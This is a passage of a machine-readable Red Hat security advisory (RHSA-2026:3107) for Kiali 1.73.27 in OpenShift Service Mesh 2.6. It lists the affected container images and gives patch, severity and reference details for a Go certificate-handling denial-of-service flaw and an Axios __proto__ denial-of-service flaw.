"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Kiali 1.73.27 for Red Hat OpenShift Service Mesh 2.6\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Kiali 1.73.27, for Red Hat OpenShift Service Mesh 2.6, provides observability for the service mesh by offering a visual representation of the mesh topology and metrics, helping users monitor, trace, and manage efficiently\n\nSecurity Fix(es):\n\n* kiali-ossmc-rhel8: Axios affected by Denial of Service via __proto__ Key in mergeConfig (CVE-2026-25639)\n\n* kiali-rhel8: Axios affected by Denial of Service via __proto__ Key in mergeConfig (CVE-2026-25639)\n\n* kiali-rhel8: golang: Denial of Service due to excessive resource consumption via crafted certificate (CVE-2025-61729)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:3107",
"url": "https://access.redhat.com/errata/RHSA-2026:3107"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61729",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/cve-2025-61729",
"url": "https://access.redhat.com/security/cve/cve-2025-61729"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/cve-2026-25639",
"url": "https://access.redhat.com/security/cve/cve-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification",
"url": "https://access.redhat.com/security/updates/classification"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_3107.json"
}
],
"title": "Red Hat Security Advisory: Kiali 1.73.27 for Red Hat OpenShift Service Mesh 2.6",
"tracking": {
"current_release_date": "2026-04-16T10:28:08+00:00",
"generator": {
"date": "2026-04-16T10:28:08+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:3107",
"initial_release_date": "2026-02-23T17:16:07+00:00",
"revision_history": [
{
"date": "2026-02-23T17:16:07+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-02-23T17:16:16+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:28:08+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Service Mesh 2.6",
"product": {
"name": "Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.6::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256%3A148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771230055"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256%3Afcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771229736"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256%3A87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771230055"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256%3A3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771229736"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256%3Ae2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771230055"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256%3Ae3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771229736"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256%3A4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771230055"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256%3A3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771229736"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64 as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64 as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64 as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64 as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61729",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2025-12-02T20:01:45.330964+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418462"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "RHBZ#2418462",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418462"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://go.dev/cl/725920",
"url": "https://go.dev/cl/725920"
},
{
"category": "external",
"summary": "https://go.dev/issue/76445",
"url": "https://go.dev/issue/76445"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4",
"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4155",
"url": "https://pkg.go.dev/vuln/GO-2025-4155"
}
],
"release_date": "2025-12-02T18:54:10.166000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-23T17:16:07+00:00",
"details": "See Kiali 1.73.27 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3107"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-23T17:16:07+00:00",
"details": "See Kiali 1.73.27 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x",
